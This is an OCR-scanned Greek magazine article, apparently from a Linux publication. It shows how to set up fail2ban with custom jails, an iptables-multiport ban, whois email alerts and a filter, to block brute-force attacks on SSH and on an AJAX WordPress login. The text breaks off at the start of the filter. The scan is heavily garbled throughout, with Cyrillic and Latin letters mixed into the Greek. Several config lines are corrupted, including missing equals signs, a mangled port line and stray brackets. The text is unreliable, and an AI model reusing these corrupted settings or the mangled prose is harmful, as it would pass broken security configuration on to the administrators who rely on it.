Θαυμάσιο πράγμα η koivr] λογική. ‘Exel "εφευρεθεί" апо καταβολἠς κόσμου, αλλά 
προβλέπει τα πάντα. Н κοινἠ λογικὴ ἐχει πολλά να µας πει, ακόμα και για τους υπο- 
λογιστὲς, τα λειτουργικά συστήματα και τα δίκτυα. Έτσι δεν εἶναι; Υπάρχει κάποιος, 
ας πούμε, που να µη γνωρίζει ὁτι τα απὀλυτα ασφαλἠ συστήματα υπάρχουν μόνο 
στη φαντασία µας; Υπάρχει κἀποιος που θεωρεἰ ὁτι το біко του σύστημα εἶναι апор- 
θητο και δεν κινδυνεύει апо κανέναν; Νομίζουμε πως ὀχι. Αυτό λέει η κοινἠ λογικἠ 
κι αφού το λέει αυτή ποιοι εἶμαστε εμεὶς που θα την αμφισβητήσουμε; Νομίζουμε, 
λοιπὸν, ὁτι το θέμα της ασφάλειας των υπολογιστών δεν χρειάζεται ιδιαίτερη εισα- 
үшүп. Ὅσοι συντηρούν κάποιο μηχάνημα µε Linux και παρέχουν δυο-τρεις δικτυα- 
KEG υπηρεσίες, οφείλουν να επιδεικνύουν πάντα τη μέγιστη προσοχή. Н αλαζονεία 
αποτελεἰ επικἱνδυνο σύμβουλο. Στο като като, ὁποιος φυλάει τα ρούχα του EXE! τα 
μισά!, 


Στο τεύχος 032 αναφερθήκαμε σ' ἑναν μηχανισμὀ ασφάλειας που θέλει ὁλες τις 
δικτυακὲς θύρες ενὸς server εξ ορισμού κλειστὲς και ν' ανοίγουν μόνον συγκεκρι- 
μένες, аркеі o client να γνωρίζει µια προκαθορισμένη ακολουθἱα ελέγχου θυρών. О 
λόγος γίνεται yia то Port Knocking, που ενώ εἶναι δυνατὸν ν' αποδειχθεὶ πολύτιμος 
σύμμαχος στο διαρκἠ αγώνα yia την ασφάλεια ενὸς συστήματος, δεν αποκλείεται 
όμως va µετατραπεἰ kai σε μέγα βάσανο nou θα ταλαιπωρεἰ περισσότερο εμάς και 
λιγότερους τους επιτιθέµενους. Αν εξάλλου το μηχάνημα που θέλουμε va npoora- 
τεύσουμε χρησιμοποιείται апо πολλούς χρήστες, τα ὁποια οφέλη rou Port Knocking 
εξανεμἰζονται γρήγορα. Σε асто το άρθρο θα συζητήσουμε µια εναλλακτικἠ λύση. 
Θα παρουσιάσουμε το апло алла εξαιρετικἀ ευἑλικτο πρὀγραμμα, ονόματι fail2ban. 


To πρὀβλημα και η λύση 


Όσοι διατηρούµε Eva σύστημα µε την υπηρεσία OpenSSH ενεργοποιημένη, εἶναι 
πολύ πιθανὸ να ἐχουμε δεχτεἰ κατὰ καιρούς επιθέσεις brute force. Αυτὲς εκδηλώ- 
νονται µε ἑναν καταιγισμὀ αιτημάτων σύνδεσης, καθεμία апо τις οποίες перілар- 
βάνει ἑνα (σχεδὸν) ruxaio ζεύγος username kai password. Ta script που εξαπολύ- 
ουν τέτοιες επιθέσεις υποστηρίζονται σχεδὸν πάντα апо ἑνα τεράστιο wordlist, που 
περιλαμβάνει "κλασικά" usernames κι ατελείωτες παραλλαγές πιθανών passwords. 
Φυσικά, ο бікос µας λογαριασμὸς рпорєі να προστατεύεται апо Eva εξαιρετικἁ ισχυ- 
ро συνθηµατικὀ, αλλά οι επιθέσεις TOU εἰδους δεν παύουν να εἶναι ενοχλητικὲς. Στο 
като- като, αν μιλάμε για σύστημα µε αρκετούς χρήστες, μπορεἰ κάποιος апо au- 
τοὺς να ἐχει αντιμετωπίσει το ζήτημα ре αφέλεια και va ἐχει επιλέξει Eva απλὸ ouv- 
θηματικὀ. Σε κάθε περίπτωση, o βομβαρδισμὸς του συστήµατος µε εκατοντάδες (ñ 
και χιλιάδες) συνδέσεις, καταναλώνει πολύτιμους πόρους και μολύνει ra log files με 
αναρίθμητες, ἄχρηστες εγγραφές. Παρόμοιες επιθέσεις μπορούν να δεχθούν και dÀ- 
λες υπηρεσίες ενὀς server, ενὠ πολλαπλὲς συνδέσεις απαιτούνται και σε ἄλλα εἰδη 
επιθέσεων. Πα παράδειγµα, σκεφτεἰτε ro "σκανάρισμα" των αρχείων που μοιράζει 
ἑνας web server, µε OKONO τον εντοπισμὸ γνωστῶν PHP scripts που περιλαμβάνουν 
ευπαθἠ κὠδικα. Τα παραδείγματα εἶναι ανεξάντλητα. 


Н ιδανικἠ λύση θα ἦταν va τροποποιούµε τις ρυθμίσεις του firewall κάθε фора nou 
ξεκινά µια επίθεση, ὥστε ο επιτιθέμενος va αποκόβεται πλήρως апо το σύστημα. 
Κάτι τέτοιο βέβαια προὐποθέτει τη διαρκἠ παρακολούθηση των αρχείων καταγραφἠς 
(log files) και την άμεση επέμβαση στις ρυθμίσεις rou firewall. AUTO προφανώς θα 


1. Αυτή η πρόταση αποτελεἰ μέρος της λαϊκής θυμοσοφίας, η οποία ως γνωστό αντανακλά την κοινἠ λογική :) 
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ÁN 


ἠταν ιδιαίτερα κουραστικὀ για κἄποιον ἄνθρωπο, yia va µην πούμε апла αδύνατο. 
To firewall του Linux, εξάλλου, εἶναι το iptables και δεν φημίζεται για την ευχρηστία 
του. Επομένως η παραπάνω λύση θα περιείχε και µια αυξημένη πιθανότητα va oup- 
βούν λάθη. 


Και κάπου εδὠ ἐρχεται то fail2ban κι αναλαμβάνει να κάνει όλη τη βρώμικη δουλειά 
της παρακολούθησης των log files, ενώ επιπρὀσθετα µπορεί να επεμβαίνει στις ρυθ- 
µίσεις του iptables ἆμεσα και εὐστοχα. Όπως σκοπεύουμε να σας αποδεϊἰξουµε σε 
πολύ λίγο, πρὀκειται yia Eva εργαλείο που παρουσιάζει μεγάλη ευελιξία και μπορεὶ 
va αξιοποιηθεὶ σε пара πολλὲς καταστάσεις. Ας προχωρήσουμε орос σ' αυτή την 
απὀδειξη. 


Ἐλεγχος και αντιμετώπιση 


Το fail2ban παρακολουθεἰ διαρκὠς τα αρχεία καταγραφής του συστήματος κι όταν 
εντοπίζει τη διενέργεια κάποιας επίθεσης, паіругі τα κατάλληλα µέτρα. Αναρωτιέστε 
noc рпореі Eva πρὀγραμμα να αξιολογήσει τη συμπεριφορά ενὸς ανθρώπου και να 
αποφασίσει αν εἶναι επικίνδυνη και πιθανὰ εχθρικἠ; Н αλήθεια εἶναι ὁτι δεν µπορεἰ. 
Ἐχει дрос την ικανότητα να υπολογίζει µε ακρίβεια τη συχνότητα HE την οποία ouv- 
δέεται κἄποιος χρήστης. Επιπρὀσθετα διαθέτει και Eva αρχείο ρυθμίσεων, µέσω του 
οποίου μπορούμε να προσδιορίσουμε ποιες συνδέσεις θεωρούνται SUVNTIKG επικἱν- 
δυνες. Τελικά, µε λίγη βοήθεια апо μέρους µας το fail2ban καταφέρνει να εντοπίζει 
τις ενοχλητικὲς συμπεριφορές και τότε η avriópaor| rou εἶναι αμείλικτη. Αυτή η 
πρόταση ενδέχεται να δημιούργησε µια νέα anopia: Τι εἰδους δράση αναλαμβάνει то 
fail2ban yia την απὀκρουση των επιτιθέμενων; Όταν ro πρὀγραμμα αποφασίζει OT! οἱ 
συνδέσεις ενὸς χρήστη αποτελούν μέρος µιας επίθεσης, εισάγει στο firewall του ou- 
στήματος Eva VEO κανόνα και μπλοκάρει каве σύνδεση του χρήστη προς τη σχετικἠ 
υπηρεσία. Προαιρετικἀ, το fail2ban αξιοποιεἰ το προγραμματάκι whois και συλλέγει 
διάφορες πληροφορἱες για rov επιτιθἐµενο, τις οποίες kai προωθεί στο διαχειριστή 
του συστήματος ре email. 


Εγκατάσταση kai προετοιµασἰία 


Па τις ανάγκες rou άρθρου εργαστήκαµε бе Eva σύστημα µε ro αγαπημένο µας 
CrunchBang. Πα την εγκατάσταση του fail2ban δώσαμε то εξἠς: 


sudo apt-get install fail2ban 


Με τον ібіо τρόπο πραγματοποιείται η εγκατάσταση και σε каде ἄλλη διανομή Linux 
που βασίζεται στο Debian. Επίσης, το fail2ban υπάρχει στα repositories Лоу των 
γνωστών διανομών кі εγκαθίσταται EUKOAG µε το αντίστοιχο εργαλείο. Мета την 
апл διαδικασία εγκατάστασης, μπορούμε κι οφείλουμε να προχωρήσουμε στη ρύθ- 
шоў του. Τα σχετικἁ αρχεἰα βρίσκονται στον κατάλογο /etc/fail2ban, αλλά кало θα 
ἦταν να µη σπεύσουμε να τα τροποποιήσουμε, αφού σε μελλοντικὲς αναβαθμίσεις 
του προγράμματος ενδέχεται v' αντικατασταθούν. Οι проурарцатістёс του fail2ban 
προτείνουν να δημιουργήσουμε αντίγραφα και να τοποθετήσουμε σ' αυτά τις επιθυ- 
μητὲς ρυθμίσεις. Ακολουθώντας την προτροπή τους, εκτελούµε τα εξής: 


sudo ср /etc/fail2ban/jail.conf /etc/fail2ban/jail.local 
sudo cp /etc/fail2ban/fail2ban.conf /etc/fail2ban/fail2ban.local 
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sc pvar@crunchbang: ~ - ох 
pvarécrunchbang:-$ 
pvar&crunchbang:-$ 
pvarécrunchbang:-$ sudo apt-get install fail2ban 
[sudo] password for pvar: 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
The following extra packages will be installed: 
gamin 1ірдатіп0 python-central python-gamin 
Suggested packages: 
mailx 
The following packages will be REMOVED: 
libfam0 
The following NEW packages will be installed: I 
fail2ban gamin libgamin0O python-central python-gamin 
0 upgraded, 5 newly installed, 1 to remove and 93 not upgraded. 
Need to get 299 kB of archives. 
After this operation, 953 kB of additional disk space will be used. 
Do you want to continue [Y/n]? 


Н εγκατάσταση rou fail2ban πραγματοποιείται пауеўкола σε 
όλες τις διανομές. Σε εκείνες που βασίζονται στο Debian αρκεί 
va καταφύγουµε στο αγαπημένο apt-get. 


Με auróv τον τρὀπο δημιουργείται Eva αντίγραφο για καθένα апо τα δύο αρχεία 
ρυθμίσεων του προγράμματος. Σύμφωνα µε τις οδηγίες, τα ονόματα των αντιγρά- 
φων διαφοροποιούνται µόνο στην κατάληξη (local avri yia conf). Πριν προχωρήσου- 
με, σημειώστε Ori οι εργασἰες που θα δούμε πραγματοποιούνται σχεδὸν αποκλειστι- 
ка στο αρχείο jail.local. Το αρχείο fail2ban.local περιλαμβάνει κάποιες πολὺ γενικὲς 
ρυθμίσεις του προγράμματος, που στις περισσότερες περιπτώσεις δεν έχουμε KAVE- 
να λὀγο va πειράξουμε. 


Φυλακές για ενοχλητικούς τύπους 


Εσεἰς πόσο αυστηροί νιώθετε σήμερα; Αυτή η ερώτηση δεν εἰναι καθόλου τυχαία, 
διότι ша апо τις βασικὲς ρυθμίσεις αφορά στην ευαισθησία που θα επιδεικνύει TO 
fail2ban ως προς rov χαρακτηρισμό ενὸς client oc attacker. Μια ακόµα ερώτηση nou 
πρέπει ν' απαντήσουμε αφορά ото ποιες υπηρεσίες θα θέλαμε να προφυλάξουμε апо 
τις απανωτὲς συνδέσεις των ενοχλητικὠν χρηστών. Όλα аста θα ra προσδιορίσουμε 
στο αρχείο /etc/fail2ban/jail.local. Evróc του συγκεκριμένου αρχείου μπορούμε va 
ενεργοποιήσουµε κάποιο апо τα διαθέσιμα jails ἡ και να δημιουργήσουμε та бка 
μας. Ta jails αποτελούν μικρὰ πακέτα ρυθμίσεων που παρουσιάζουν πλήρη αυτονο- 
uia μεταξύ τους. Κάθε jail εξειδικεύεται στην παρακολούθηση µιας συγκεκριμένης 
υπηρεσίας, περιγράφει την αντιμετώπιση των επιτιθέµενων, оріс την ευαισθησία 
που θα επιδεικνύει το fail2ban к.а. Εκτὸς апо τις επιµέρους ρυθμίσεις για κάθε 
υπηρεσία, το αρχείο jail.local περιλαμβάνει και uia ενότητα καθολικών ρυθμίσεων. 
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Ουσιαστικἀ, πρὀκειται για Eva ακόµα jail, µε την ειδικἠ (και πλήρως διαφωτιστικὴ) 
ονομασία DEFAULT. Κάθε ρύθμιση που πραγματοποιείται εκεὶ ισχύει για όλα τα jails, 
εκτὸς αν σε κάποιο επιβάλλουμε κάτι διαφορετικὀ. Όμως οι θεωρητικὲς періурафёс 
εἶναι πιθανὀ να σας μπερδέψουν, ἴσως και να σας αποθαρρύνουν апо τη χρήση rou 
fail2ban. Ας ξεκινήσουμε εξετάζοντας Eva апо ra ἑτοιμα jails και θα διαπιστώσετε 
σύντομα Ori τα πράγματα εἶναι αρκετά апла. Av ανοἰξουµε το jail.local και μεταβού- 
µε στην περιοχἠ JAILS (περὶ τα μέσα του αρχείου), θα συναντήσουμε μικρὲς ενότη- 
τες ρυθμίσεων σαν την ακόλουθη: 


[ssh] 

enabled = true 
port = ssh 
filter = sshd 


logpath = /var/log/auth.log 


maxretry 6 


AuTr| εἶναι η μορφὴ ενὸς τυπικού jail, nou περιλαμβάνει τις ελάχιστες απαιτούμε- 
vec ρυθμίσεις. Та jails ξεκινούν πάντα µε Eva ὀνομα που επιλέγουμε αυθαίρετα και 
το οποίο τοποθετεἰται μέσα σε αγκύλες. Προφανώς, η πρώτη παράμετρος του na- 
ραδείγματος καθορίζει αν το συγκεκριµένο jail θα εἶναι ενεργὀ ἡ ὀχι. To fail2ban, 
βλέπετε, επιτρἐπει στο χρήστη να απενεργοποιεἰ όποια jails επιθυμεί, χωρίς va δι- 
αγράφει υποχρεωτικά και τις αντίστοιχες ρυθμίσεις. Н παράμετρος port ἐχει pavs- 
рӯ ερμηνεία αλλά ох! και τόσο φανερή αποστολἠ. Προσδιορίζει τη δικτυακἠ θύρα 
την onoia ελέγχει η υπηρεσία του συγκεκριμένου jail. Εδὠ, av ro ипхаупна µας 
χρησιμοποιεί το καθιερωμένο port για την εκάστοτε υπηρεσία, μπορούμε апла να 
δηλώσουμε ro ὀνομὰ της. Αν όμως ἐχουμε αλλάξει τις ρυθμίσεις της υπηρεσίας, 
μπορούμε να χρησιμοποιήσουμε αριθμητικὲς τιμὲς και να δηλώσουμε το σχετικὸ 
port µε απὀλυτη σαφήνεια. Ауаротіёсте тора γιατὶ πρέπει να δηλώσουμε τη θύρα 
που χρησιμοποιείται апо την υπηρεσία; Όπως έχουμε πει, To fail2ban εντοπίζει τις 
επιθέσεις εξετάζοντας τα αρχεία καταγραφἠς кі ὀχι τα δικτυακά πακέτα που φτάνουν 
στο σύστημα. Στην περίπτωση nou εντοπιστεἰ κάποιος επιτιθέμενος, ro fail2ban 
επιστρατεύει το iptables και τον μπλοκάρει. AUTO το μπλοκάρισµα орос δεν εἶναι 
καθολικὀ. Απαγορεύει *uóvo* τις συνδέσεις rou επιτιθέµενου προς то συγκεκριµένο 
port кі ара προς τη συγκεκριμένη υπηρεσία. Ev ολἰγοις, η τιµή που δίνουμε στην 
παράμετρο port αξιοποιείται yia TO σχηματισμό του κατάλληλου κανόνα, ο οποίος θα 
προστεθεί στο iptables yia την απὀκρουση κάποιου επιτιθἐµενου. 


Н παράμετρος filter προσδιορἰζει τον τρόπο µε τον onoio εντοπἰζονται οι επιτιθἐµε- 
vol. Па τα φίλτρα θα μιλήσουμε στη συνέχεια kai δεν χρειάζεται να ανησυχείτε για 
την ора. To logpath δηλώνει το αρχείο καταγραφἠς nou θα παρακολουθείται апо 
TO fail2ban, yia τον εντοπισμὸ των επιτιθἐµενων στη συγκεκριμένη υπηρεσία. Ou- 
σιαστικἀ, αποτελεἰ то log της υπηρεσίας oro οποἱο καταγράφονται οι συνδέσεις των 
χρηστών. Τέλος, то maxretry ορίζει το πλήθος των συνδέσεων που επιτρέπεται va 
πραγματοποιήσει κανεὶς µέσα бе ἑνα συγκεκριµένο χρονικό πλαίσιο, πριν θεωρηθεὶ 
ότι прауцатопоіеі επίθεση brute force. Н διάρκεια αυτού του χρονικού πλαισίου 
προσδιορἰζεται апо ro μέγεθος findtime και η σχετικἠ δήλωση βρίσκεται oro ξεκίνη- 
μα του jail.local, στην ενότητα DEFAULT: 
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T pvar@crunchbang: /etc/fail2ban η. 
pvarécrunchbang:/etc/fail2ban$ 

pvarécrunchbang:/etc/fail2ban$ ls -lh 

total 32K 

drwxr-xr-x 2 root root 4.0K Jul 4 08:48 action.d 

-rw-r--r-- 1 root root 853 Nov 28 2011 fail2ban.conf 

-rw-r--r-- 1 root root 853 Jul 4 17:10 fail2ban.local 

drwxr-xr-x 2 root root 4.0K Jul 4 17:07 filter.d 

-rw-r--r-- 1 root root 7.2K Jun 12 2013 jail.conf 

-rw-r--r-- 1 root root 7.2K Jul 4 17:10 jail.local 
pvarécrunchbang:/etc/fail2ban$ I 


Ta еруоставіака αρχεία ρυθμίσεων ενδέχεται va αλλοιωθούν 
ката τις αναβαθμίσεις του προγράµµατος. Ακριβώς γι’ аитду то 
λόγο οι προγραμματιστές rou fail2ban προτείνουν να δημιουργή- 
coupe αντίγραφα και να εργαστούμε ие αυτά. 


findtime - 600 


Н παραπάνω τιμή αναφέρεται σε δευτερόλεπτα. Πριν προχωρήσουμε σ' Eva nio Ka- 
τατοπιστικὀ παράδειγµα, οφείλουμε να σταθούμε σε δύο ακόµα ζητήματα. Па πόση 
фра θα μπλοκάρονται оі επιτιθἐµενοι; Αν σκοπεύετε ν' απαντήσετε μ' Eva "για nå- 
ντα", σκεφτεἰτε от! συμβαίνουν και λάθη. Εξάλλου, η διεύθυνση IP των περισσο- 
τέρων χρηστών στο Internet εἶναι δυναμική κι OXI στατικἠ. Αυτό σημαίνει От! η 
διεύθυνση που σήμερα ανήκει σε £vav κακόβουλο χρήστη, μετὰ апо μερικὲς μέρες 
ενδέχεται να αποδοθεί σε κάποιον εντελὠς αθώο κι ανυποψίαστο. Εἶναι φανερὀ, 
λοιπὸν, ӧті τα μπλοκαρἰσματα δεν прёпеі να ισχύουν επ' αὀριστον. Па Tov προσδι- 
ορισμὀ του σχετικού χρονικού διαστήματος (σε δευτερόλεπτα πάντα) προσφέρεται 
το μέγεθος bantime. H δἠλωσὴ του βρίσκεται επἰσης στην ενότητα DEFAULT, στο 
ξεκίνημα του jail.local: 


bantime = 1800 


Αναφέραµε νωρίτερα oT! το fail2ban µπορεί να μπλοκάρει τους επιτιθέµενους κι 
εφόσον το επιθυμούμε να µας στέλνει ενημερωτικά email yia каде μπλοκάρισµμα. 
Mnopeite να φανταστείτε поў ορἰζονται αυτές οι ενέργειες; Σε µια ειδικἠ ενότητα 
του jail.local, που στη ουσία περιλαμβάνει μερικὲς ακόμα γενικὲς ρυθμίσεις. Περισ- 
σότερα για τις ενέργειες του fail2ban θα πούμε στη συνέχεια. 


63 


(COOKER 


ÁN 


H δικἠ µας φυλακή... για τους ἄλλους 


Το παράδειγµα nou εξετάσαµε προέρχεται апо το εργοστασιακὀ αρχείο ρυθμίσεων 
του fail2ban, στη διανομή CrunchBang. Αν ανοίξετε το σχετικὀ αρχείο και διαπι- 
OTWOETE Ori το jail για το SSH περιλαμβάνει διαφορετικὲς ρυθμίσεις, µη σας φανεὶ 
παράξενο. Οι ρυθμίσεις του προγράμματος παρουσιάζουν µια μικρὴ διαφοροποίηση 
ano διανομή σε διανομὴ, αλλά ακολουθούν πάντα την ἰδια λογική. Av μελετήσετε τα 
παραδεἰγματὰ рас, εἰμαστε σίγουροι OT! δεν θα κολλήσετε πουθενὰ. 


Στη συνέχεια θα δούμε τη δομή Evoc jail που κατασκευάσαμε μόνοι µας. O σκοπὸς 
μας ἦταν να προφυλάξουµμε τη φόρμα σύνδεσης (login form) Evoc site που στηρἰζεται 
στο WordPress. Στο συγκεκριμένο site, η σύνδεση των χρηστών δεν πραγµατοποι- 
гіта! апо τις "επίσημες" φόρμες του εν λόγω CMS. Οι συγκεκριμένες φόρμες ἐχουν 
καταργηθεἰ πλήρως και η σύνδεση των χρηστῶν πραγματοποιείται апо φόρμες nou 
φορτώνονται μέσω AJAX. Με την ἴδια τεχνολογία μεταφέρονται και Ta credentials 
прос ro server. Όπως αντιλαμβάνεστε, το σενάριο χρήσης nou θα παρουσιάσουμε 
εἶναι εξειδικευμένο κι аркета προχωρημένο, αλλά θα µας δώσει την ευκαιρία να pi- 
λήσουμε για ὀλεςτις δυνατότητες του fail2ban. Πριν πούμε οτιδήποτε ἄλλο, δεἰτε то 
jail nou opioaue εντὸς του /etc/fail2ban/jail.local: 


[мр-аўах] 
enabled = true 
filter = ajaxlogin 
action = iptables-multiport [ 
name=WPAJAX , 
РО nits Om Mitts psa 
protocol=tcp ] 
sendmail-whois [ 
name=WPAJAX , 
dest=my_email@address.com, 
sender=fail2ban@my_server.com 
sendername="Fail2Ban service" | 
logpath = /var/log/nginx.access 
bantime = 3600 
findtime = 180 


maxretry = 6 


Στο δικὀ рас jail ἐχουμε παραθέσει OAEG σχεδὀν τις ρυθμίσεις που υποστηρίζει то 
fail2ban. Аркетёс апо αυτὲς βρίσκονται και στην ενότητα DEFAULT ἡ σε άλλες, που 
xouv επἰσης γενικἠ ισχύ. Με ἀλλα λὀγια θα μπορούσαμε va τις εἶχαμε παραλείψει, 
αλλά δεν το κάναμε! Αυτό δεν ἐγινε τυχαία, οὐτε και για τις ανάγκες της παρουσἰ- 
aons. Θέλαμε να εξασφαλἰσουµε бт! στο δικὀ µας jail θα ισχύουν αποκλειστικἁ о! 
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m pvar@crunchbang: /etc/fail2ban/action.d = D x 
pvarécrunchbang:/etc/fail2ban/action.d$ ls -lh 

total 96K 

-rw-r--r-- 1 root root 3.4K Nov 28 2011 complain.conf 

-rw-r--r-- 1 root root 7.8K Nov 28 2011 dshield.conf 

-rw-r--r-- 1 root root 1.3K Nov 28 2011 dummy.conf 

-rw-r--r-- 1 root root 1.3K Nov 28 2011 hostsdeny.conf 

-rw-r--r-- 1 root root 1.4K Nov 28 2011 ipfilter.conf 

-rw-r--r-- 1 root root 1.4K Nov 28 2011 ipfw.conf 

-rw-r--r-- 1 root root 1.9K Nov 28 2011 iptables-allports.conf 
-rw-r--r-- 1 root root 2.0K Nov 28 2011 iptables.conf I 
-rw-r--r-- 1 root root 2.0K Nov 28 2011 iptables-multiport.conf 
-rw-r--r-- l root root 2.6K Nov 28 2011 iptables-multiport-log.conf 
-rw-r--r-- 1 root root 2.1K Nov 28 2011 iptables-new.conf 

-rw-r--r-- 1 root root 2.5K Jun 12 2013 iptables-xt recent-echo.conf 
-rw-r--r-- 1 root root 2.4K Nov 28 2011 mail-buffered.conf 
-rw-r--r-- 1 root root 1.7K Nov 28 2011 mail.conf 

-rw-r--r-- 1 root root 1.8K Nov 28 2011 mail-whois.conf 

-rw-r--r-- 1 root root 2.1K Nov 28 2011 mail-whois-lines.conf 
-rw-r--r-- 1 root root 5.3K Nov 28 2011 mynetwatchman.conf 
-rw-r--r-- 1 root root 2.9K Nov 28 2011 sendmail-buffered.conf 
-rw-r--r-- 1 root root 2.2K Nov 28 2011 sendmail.conf 

-rw-r--r-- 1 root root 2.3K Nov 28 2011 sendmail-whois.conf 
-rw-r--r-- 1 root root 2.5K Nov 28 2011 sendmail-whois-lines.conf 
-rw-r--r-- 1 root root 1.6K Nov 28 2011 shorewall.conf 


pvarécrunchbang:/etc/fail2ban/action.d$ 


To fail2ban υποστηρίζει αρκετὲς διαφορετικές ενέργειες για την αντιµε- 

тотоп των επιτιθέµενων. Καθεμία апо αυτὲς περιγράφεται σε ξεχωρι- 

oTO αρχείο, μέσα στον κατάλογο /etc/fail2ban/action.d. Τα ονόματα των 

αρχείων χωρίς την κατάληξη (ro ".conf") μπορούν να χρησιμοποιηθούν 

σαν τιμές για To μέγεθος action, στον орсо ενός jail. 

δικὲς µας ρυθμίσεις. Επιπρὀσθετα, θέλαμε να ἐχουμε την καλύτερη δυνατὴ εποπτεία 
της λειτουργίας του jail, xopic να τρέχουμε πάνω като στο αρχεἰο jail.local. 


Н πρώτη ρύθμιση (filter) афора στον τρόπο με rov onoio εντοπἱζονται οι επισκέπτες 
που κάνουν κατάχρηση της φόρμας σύνδεσης. Εκεὶ δώσαμε την τιμὴ "ajaxlogin". Μη 
φανταστείτε ότι αποτελεἰ κάποια ειδικἠ τιμή που αναγνωρίζει то fail2ban. Πρόκειται 
για éva φίλτρο που ορἰσαμε μόνοι µας, για τη σάρωση των αρχείων καταγραφἠς kai 
τον εντοπισµὀ των επαναλαμβανόμενων συνδέσεων. Αναρωτιέστε που στο кало opi- 
ζονται τα φίλτρα; Πα τον ορισμό каве φίλτρου υπάρχει Eva ξεχωριστὀ αρχείο, μέσα 
στον κατάλογο /etc/fail2ban/filter.d. Αργότερα θα παρουσιάσουμε το φίλτρο µας και 
θα λυθούν όλες οι OXETIKEG апоріес. 


Н αμέσως επόμενη ρύθμιση (action) συγκεντρώνει το περισσότερο ενδιαφέρον. Σε 
αυτήν δηλώνουμε την ενέργεια που θέλουμε να εκτελεὶ ro fail2ban, όταν εντοπίζεται 
κάποιος επιτιθέμενος. Εμεὶς έχουμε δώσει δύο τιμὲς, διότι θέλουμε να εκτελούνται 
δύο еуёругіес! Καθεμία апо αυτές, ὁμως, δέχεται τις бікёс της παραμέτρους. Н 
πρώτη τιμή (iptables-multiport) επιβάλλει τη χρήση rou iptables yia το μπλοκάρισμα 
*noAAWV* δικτυακὠν θυρών ταυτόχρονα. Οι παράμετροι που δέχεται εἶναι οι EENG 
τρεις: 


e Name. Αποτελεὶ το ὀνομα nou θα δώσει ro fail2ban στην αλυσίδα κανόνων 
του iptables, μέσω της οποίας θα μπλοκάρονται οι ενοχλητικοὶ τύποι. Όπως 
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αντιλαμβάνεστε, η συγκεκριμένη παράμετρος δεν εἶναι κρίσιμη και θα рпороў- 
сане va της εἶχαμε δώσει οποιαδήποτε τιµή. 


e Port. Οι δικτυακὲς θύρες nou θα µπλοκάρονται για τον εκάστοτε επιτιθἐµενο2. 
Εφόσον προσπαθούμε va προφυλάξουµε το µηχανισµὀ σύνδεσης σε ёха site 
κι о web server χρησιµοποιεἰ δύο port, το μπλοκάρισμα των επιτιθέµενων 0£- 
λουµε va афора και στις δύο θύρες. Αυτός εἶναι και ο λόγος nou επιλέξαμε σαν 
action το iptables-multiport κι Ox! το σκέτο iptables. Па λὀγους πληρότητας, 
να πούμε бт! αν επιθυμµούσαμε το µπλοκάρισµα των επιτιθἐµενων апо ὁλες TIC 
δικτυακὲς θύρες, θα έπρεπε να επιλέξουμε το action ονόματι iptables-allports. 


e Protocol. To πρωτόκολλο (μεταφοράς) που θα µπλοκαριστεἰ. 


Тора μπορούμε να περάσουμε στη δεύτερη τιµή που αποδώσαµε στη ρύθμιση action. 
Н συγκεκριμένη τιµή (sendmail-whois) ενεργοποιεὶ την αυτόματη αποστολἠ email 
στον διαχειριστή, µε πληροφορίες για τον επιτιθἐµενο και το рплокарісра του. О 
παράμετροι που δέχεται αυτἠ η επιλογἠ νομίζουμε бт! δεν χρειάζονται εξήγηση. 


To jail µας ολοκληρώνεται µε μερικὲς ακόμα ρυθμίσεις. Καταρχάς, προσδιορίζουµε 
το αρχείο катаүрафӣс̧ που θα σαρώνεται апо το fail2ban, yia τον εντοπισμό των 
επιθέσεων. Επειδἠ ο μηχανισμὸς σύνδεσης στο site δεν διατηρεἰ τα біка του αρχεἰα 
καταγραφἠς, έχουμε στρέψει την προσοχὴ του fail2ban στο αρχεἰο καταγραφἠς του 
web server. Апо екеі μπορούμε να τσεκάρουµε εὐκολα ποιοι φορτώνουν τις φόρμες 
σύνδεσης. Περισσότερα γι’ αυτὸ το ζήτημα θα πούμε σε λίγο. Αμέσως нета opi- 
ζουμε ὁτι ο χρόνος рпЛокарісратос̧ για κάθε επιτιθέµενο θα ανέρχεται στα 3600 
δευτερὀλεπτα. Mia ωρίτσα πιστεύουμε Ori εἶναι αρκετἠ για να σπάσει τα νεύρα σε 
κάποιον εξυπνάκια. Апо την ἄλλη, αν ἐχει γίνει κἄποια παρεξήγηση, το ζήτημα θα 
λυθεἰ бхетіка γρήγορα. Τέλος, δηλώνουμε OT! ὁσοι πραγματοποιούν E&I διαφορε- 
тікёс συνδέσεις (maxretry) μέσα σε 180 δευτερόλεπτα (findtime), θα αντιμετωπὶ- 
ζονται ως κακὀβουλοι. Με άλλα λόγια, οι χρήστες που προσπαθούν να συνδεθούν 
στο site θα έχουν ёі προσπάθειες σε διάστηµα τριῶν λεπτῶν. Σε QUTO το διάστηµα 
ἑνας "νόμιμος" χρήστης εἰναι σίγουρο бт! θα καταφέρει να συνδεθεἰ µε επιτυχία. 
Αντίθετα, ёуас τύπος nou праунатопоіеі αυτοματοποιημένες επιθέσεις brute force 
εἶναι σίγουρο Ori θα αποτύχει και θα µπλοκαριστεἰ. Ένας πονηρὀς επιτιθέμενος που 
πραγματοποιεὶ τις δοκιμὲς µε μικρότερη συχνότητα, δεν θα μπλοκαριστεὶ αλλά δεν 
θα ολοκληρώσει την επἰθεση ποτέ. 


Εντοπισμός ὑποπτων συνδέσεων 


Ме тїс ρυθμίσεις που εξετάσαμµε, ro jail για την περιφρούρηση της φόρμας σύνδεσης 
TOU Site εἶναι σχεδόν ἑτοιμο. AUTO που μένει εἶναι να ορίσουμε το κατάλληλο φίλτρο, 
µε το οποίο θα ανιχνεύονται οι χρήστες που προσπαθούν να συνδεθούν. Όπως el- 
παμε, ο ορισμός των φίλτρων πραγματοποιείται σε ξεχωριστά αρχεία στον κατάλογο 
/etc/fail2ban/filter.d. Θυμηθείτε επἰσης бт! ὁταν ορἰσαμε το μέγεθος filter εντός του 
jail, δώσαμε την τιμὴ ajaxlogin. Πα την περιγραφή του φίλτρου μας, λοιπὸν, δημι- 
OUPYNOGHE Eva αρχείο µε TO ὀνομα ajaxlogin.conf. Μέσα στο συγκεκριµένο аругіо 
τοποθετήσαμε τα εξής: 


2. Στο παράδειγµα που εξετάσαµε νωρίτερα, η παράμετρος port εἶχε οριστεί στο κυρίως σώμα rou jail. Ωστόσο, μπορεὶ κάλλιστα va οριστεἰ 
και µέσα στο action, αφού οὕτως ἡ ἄλλως εκεἰ θα αξιοποιηθεί. 
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Ü entpévav.. κλειδώνεται απέξω 
PPP 


[INCLUDES] 

before - common.conf 

[Definition] 

